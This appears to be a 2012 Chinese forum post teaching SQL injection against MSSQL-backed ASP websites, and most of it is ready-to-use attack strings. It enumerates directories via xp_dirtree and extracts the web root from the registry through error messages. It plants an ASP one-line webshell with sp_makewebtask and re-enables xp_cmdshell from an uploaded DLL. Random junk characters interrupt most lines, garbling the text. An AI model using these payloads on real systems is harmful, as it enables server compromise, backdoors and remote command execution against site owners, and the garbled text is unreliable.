好,我们exec master..xp_dirtree'd:/test'
- b2 [$ p) Y" A( N$ E( D假设我们在test里有两个文件夹test1和test2在test1里又有test3
) k" ^. U8 S3 l" H; r结果显示& U6 k6 _+ q! l% M3 z: O
+ x2 U) N1 {4 Y! m4 A
subdirectory depth P8 B5 n& _7 V6 W; @# m: G3 g
test1 1
- J4 U$ j; A2 c; D0 l( i# Ztest3 2( {' f2 O9 B* |5 O
test2 1
% e. |8 m7 k$ ?+ A
( @! R, p7 e+ d" f8 ^* W哈哈发现没有那个depth就是目录的级数
1 [" I1 H- l: Dok了,知道怎么办了吧
" h$ M' p6 H2 x( B9 M
+ x$ S9 {: L/ W$ s9 b% P6 phttp://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)-- ! t+ D; H+ e d- X6 ^9 N& d
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
+ N1 C9 t4 P4 ^' Ohttp://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-0 v( c4 B* H: V$ d% F0 N
- ^* M9 l8 }" ?, ]" R只要加上id=1,就是第一级目录 。4 o# J+ e* \8 [3 X9 c$ K; ?
/ h' `( `% Y' Y* a5 x; N
% Q6 I9 J/ W& C1 l0 L; n$ T
通过注册表读网站路径:/ t: z. z( ?1 Z; J% D7 ?# K7 t
' ?$ D: O% P$ U7 _& | G1.;create table [dbo].[cyfd] ([gyfd][char](255));& F1 |* P1 H" ^) T3 C0 i
* R# v6 D8 P* f' e2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--# I% ?2 W7 {; x% l5 @
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
5 O% D" f" m& ], s0 A4 n9 i8 C3 k u2 _8 H0 l# g& f* L
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
4 M- V6 k1 U+ b! V' Yand 1=(select count(*) from cyfd where gyfd > 1) ( ^7 w: t3 l- I: ^1 W' I$ F1 K
这样IE报错,就把刚才插进去的Web路径的值报出来了
: u) f; o/ F Z. b! D# N% Y
+ l# q+ C: Z. Z2 Y( {5 U: E4.drop table cyfd;-- 删除临时表# @; i( u3 n( R) T) T0 E& B; Q2 ~; M
( s+ M/ G1 M1 ]% O
获得webshell方法:
; H' T3 r- s7 `. ]7 B1.create table cmd (a image)-- \**cmd是创建的临时表
9 ~( l: A; {8 z2 B3 q4 `# P) b9 Y2 H
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话; j$ f' a" r. T; G$ I
5 Q- O/ L2 u) J7 P
. d' \7 R; z5 N
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
$ m& [7 W7 |' c3 sEXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'6 k! @' N1 P5 G7 L& }
/ E$ k; t* r: e. E; M# H; e' h$ R
4.drop table cmd;-- 删除cmd临时表& `2 m7 i4 X5 ]3 A2 Z
6 f( H; m, A+ W, L3 x: j2 ~
恢复xp_cmdshell方法之一:3 V% u; [8 t5 z) J' P, b) ^9 ?
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
! _" \! X; {6 w" n/ Uhttp://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'+ R8 T v8 z [! f& E1 c3 `
恢复,支持绝对路径的恢复哦。:)
6 W& R% G; s4 y$ f; `/ c, i |
发表于 2012-9-13 17:20:30
收藏
支持
反对